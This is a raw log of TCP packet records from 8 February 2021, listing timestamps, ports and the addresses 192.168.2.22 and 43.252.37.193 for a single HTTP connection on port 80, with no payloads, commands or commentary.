Feb 8, 2021 06:39:15.380798101 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:15.380812883 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:15.410356045 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:15.585778952 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:15.585844040 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:15.585884094 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:15.585922956 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:15.585958004 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:15.585962057 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:15.585993052 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:15.586000919 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:15.586013079 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:15.586051941 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:15.586055994 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:15.586093903 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:15.617659092 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:15.617815018 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:15.790672064 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:15.790735006 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:15.790772915 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:15.790821075 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:15.790863991 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:15.790869951 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:15.790900946 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:15.790905952 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:15.790906906 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:15.790908098 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:15.790946960 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:15.790947914 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:15.790985107 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:15.790987968 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:15.791023970 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:15.822567940 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:15.822632074 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:15.822673082 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:15.822696924 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:15.834094048 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:15.995948076 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:15.996028900 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:15.996063948 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:15.996103048 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:15.996170998 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:15.996201992 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:15.996201992 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:15.996236086 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:15.996243000 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:15.996269941 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:15.996282101 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:15.996299028 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:15.996331930 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:15.998123884 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:16.027468920 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:16.027543068 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:16.027686119 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:16.200930119 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:16.200997114 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:16.201018095 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:16.201037884 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:16.201040983 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:16.201078892 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:16.201098919 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:16.201119900 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:16.201123953 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:16.201164007 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:16.201169014 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:16.201212883 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:16.201216936 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:16.201251984 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:16.201257944 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:16.201294899 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:16.232270956 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:16.232336044 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:16.232383966 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:16.232412100 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:16.405788898 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:16.406013966 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:16.406116962 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:16.406163931 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:16.406202078 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:16.406213999 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:16.406250000 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:16.406250954 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:16.406282902 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:16.406296015 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:16.406311035 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:16.406335115 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:16.406344891 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:16.406377077 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:16.437133074 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:16.437201023 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:16.437391996 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:16.437422037 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:16.613485098 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:16.613560915 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:16.613590956 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:16.613620996 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:16.613661051 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:16.613701105 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:16.613778114 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:16.613807917 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:16.613811016 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:16.613811970 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:16.615830898 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:16.616022110 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:16.642167091 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:16.642401934 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:16.818279028 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:16.818348885 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:16.818388939 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:16.818463087 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:16.818495035 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:16.820147038 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:16.820189953 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:16.820221901 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:16.820228100 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:16.820241928 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:16.820269108 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:16.820280075 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:16.820318937 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:17.023427010 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:17.023488045 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:17.023528099 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:17.023567915 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:17.023633957 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:17.023663044 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:17.024672031 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:17.024707079 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:17.024739027 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:17.024748087 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:17.024765015 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:17.024771929 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:17.024786949 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:17.024820089 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:17.230474949 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:17.230545044 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:17.230609894 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:17.230787992 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:17.230815887 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:17.231280088 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:17.231343985 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:17.231408119 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:17.231415033 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:17.231460094 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:17.231466055 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:17.231472015 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:17.231539011 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:17.231940031 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:17.231992006 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:17.232017040 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:17.232059956 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:17.437930107 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:17.437977076 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:17.438002110 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:17.438030958 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:17.438110113 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:17.438133955 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:17.438163042 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:17.438182116 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:17.438304901 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:17.438354015 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:17.438416004 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:17.438446045 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:17.438483953 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:17.438500881 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:17.438724041 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:17.438777924 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:17.439270020 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:17.642611980 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:17.642687082 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:17.642729998 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:17.642777920 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:17.642888069 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:17.642920017 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:17.642978907 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:17.643021107 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:17.643059015 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:17.643069029 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:17.643098116 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:17.643115044 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:17.643143892 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:17.847606897 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:17.847666979 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:17.847706079 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:17.847749949 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:17.847788095 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:17.847826958 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:17.847840071 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:17.847867012 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:17.847873926 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:17.847887039 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:17.847893000 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:17.847918987 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:17.847932100 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:17.847978115 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:18.054677010 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:18.054728031 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:18.054765940 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:18.054794073 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:18.054820061 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:18.054846048 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:18.054851055 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:18.054934025 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:18.054940939 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:18.054943085 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:18.054953098 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:18.054995060 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:18.055130959 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:18.055166006 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:18.055191994 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:18.055233002 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:18.253215075 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:18.253400087 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:18.261488914 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:18.261656046 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:18.261859894 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:18.261955023 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:18.262094975 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:18.262161016 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:18.263462067 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:18.263526917 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:18.263540983 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:18.263576031 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:18.467621088 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:18.467658997 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:18.467678070 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:18.467698097 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:18.467722893 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:18.467752934 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:18.467881918 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:18.467902899 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:18.467922926 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:18.467940092 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:18.672148943 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:18.672178030 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:18.672188997 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:18.672203064 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:18.672219992 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:18.672235966 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:18.672250986 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:18.672271013 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:18.672379017 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:18.672456980 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:18.879590034 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:18.879647017 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:18.879684925 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:18.879723072 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:18.879760981 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:18.879760981 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:18.879800081 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:18.879801035 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:18.879827976 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:18.879839897 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:18.879847050 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:18.879856110 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:18.879894972 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:19.089487076 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:19.089533091 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:19.089559078 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:19.089582920 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:19.089602947 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:19.089617014 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:19.089627981 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:19.089641094 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:19.089643002 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:19.089646101 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:19.089648008 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:19.089653969 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:19.089679003 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:19.089690924 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:19.296849966 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:19.296914101 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:19.296955109 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:19.297000885 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:19.297003984 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:19.297048092 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:19.297071934 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:19.297075033 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:19.297076941 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:19.297086000 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:19.297087908 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:19.297126055 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:19.505546093 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:19.505618095 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:19.505660057 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:19.505697012 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:19.505734921 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:19.505779028 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:19.505808115 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:19.505810976 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:19.505814075 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:19.505820990 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:19.711745024 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:19.711770058 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:19.711791039 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:19.711811066 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:19.711812019 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:19.711833000 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:19.711837053 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:19.711837053 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:19.711884022 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:19.711904049 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:19.916779041 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:19.916836977 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:19.917040110 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:19.917074919 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:20.121803045 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:20.121874094 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:20.121932030 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:20.122062922 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:20.122097969 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:20.122102976 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:20.326898098 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:20.326958895 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:20.326999903 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:20.327120066 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:20.327179909 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:20.327188015 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:20.535491943 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:20.535550117 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:20.535589933 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:20.535773039 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:20.740263939 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:20.740294933 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:20.740309954 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:20.740326881 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:20.740361929 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:20.740405083 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:20.740411997 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:20.944634914 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:20.944864988 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:20.945244074 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:20.945266008 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:20.945337057 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:20.945349932 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:21.149463892 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:21.149490118 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:21.149502039 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:21.149513960 CET	80	49165	43.252.37.193	192.168.2.22
Feb 8, 2021 06:39:21.149703026 CET	49165	80	192.168.2.22	43.252.37.193
Feb 8, 2021 06:39:21.149749041 CET	49165	80	192.168.2.22	43.252.37.193
